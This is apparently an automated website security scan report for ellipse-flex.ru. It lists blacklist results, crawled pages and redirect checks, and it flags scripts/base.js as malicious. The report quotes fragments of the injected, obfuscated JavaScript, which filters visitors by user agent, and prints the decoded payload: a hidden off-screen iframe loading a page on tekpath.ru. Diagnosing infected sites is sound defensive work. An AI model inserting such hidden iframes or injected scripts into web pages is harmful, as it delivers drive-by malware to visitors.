Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ellipse-flex.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ellipse-flex.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ellipse-flex.ru/ | 200 OK Content-Length: 9629 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/scripts/base.js | 200 OK Content-Length: 7013 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/32','Chrom for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); if(!x && d.getElementById) x=d.getElementById(n); return x; } function MM_swapImage() { var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3) if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} } ;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://tekpath.ru/idea.html?members style="position:absolute;left:-1200px;top:-1200px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://www.ellipse-flex.ru/index.php | 200 OK Content-Length: 9629 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/the_company | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:27 GMT Location: http://www.ellipse-flex.ru/the_company/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/the_company/ | 200 OK Content-Length: 10456 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/treatment_areas | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:27 GMT Location: http://www.ellipse-flex.ru/treatment_areas/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/treatment_areas/ | 200 OK Content-Length: 11672 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/devices | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:27 GMT Location: http://www.ellipse-flex.ru/devices/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/devices/ | 200 OK Content-Length: 9541 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/ellipse_for_physicians | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:28 GMT Location: http://www.ellipse-flex.ru/ellipse_for_physicians/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/ellipse_for_physicians/ | 200 OK Content-Length: 8644 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/ellipse_for_beauticians | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:28 GMT Location: http://www.ellipse-flex.ru/ellipse_for_beauticians/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/ellipse_for_beauticians/ | 200 OK Content-Length: 8126 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/news | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:28 GMT Location: http://www.ellipse-flex.ru/news/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/news/ | 200 OK Content-Length: 7919 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/contact | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:29 GMT Location: http://www.ellipse-flex.ru/contact/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/contact/ | 200 OK Content-Length: 6949 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/contact/how_to_find_us | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:29 GMT Location: http://www.ellipse-flex.ru/contact/how_to_find_us/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/contact/how_to_find_us/ | 200 OK Content-Length: 7148 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/site_map/ | 200 OK Content-Length: 13163 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/the_company/business_mission | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:29 GMT Location: http://www.ellipse-flex.ru/the_company/business_mission/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 264 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/the_company/business_mission/ | 200 OK Content-Length: 9050 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/the_company/market_trends | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:29 GMT Location: http://www.ellipse-flex.ru/the_company/market_trends/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 261 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/the_company/market_trends/ | 200 OK Content-Length: 8916 Content-Type: text/html | clean |
http://www.ellipse-flex.ru/the_company/science_focus | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 23:01:30 GMT Location: http://www.ellipse-flex.ru/the_company/science_focus/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 261 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ellipse-flex.ru/the_company/science_focus/ | 200 OK Content-Length: 9709 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ellipse-flex.ru
Result:
GET / HTTP/1.1
Host: ellipse-flex.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ellipse-flex.ru
Referer: http://www.google.com/search?q=ellipse-flex.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ellipse-flex.ru
Referer: http://www.google.com/search?q=ellipse-flex.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.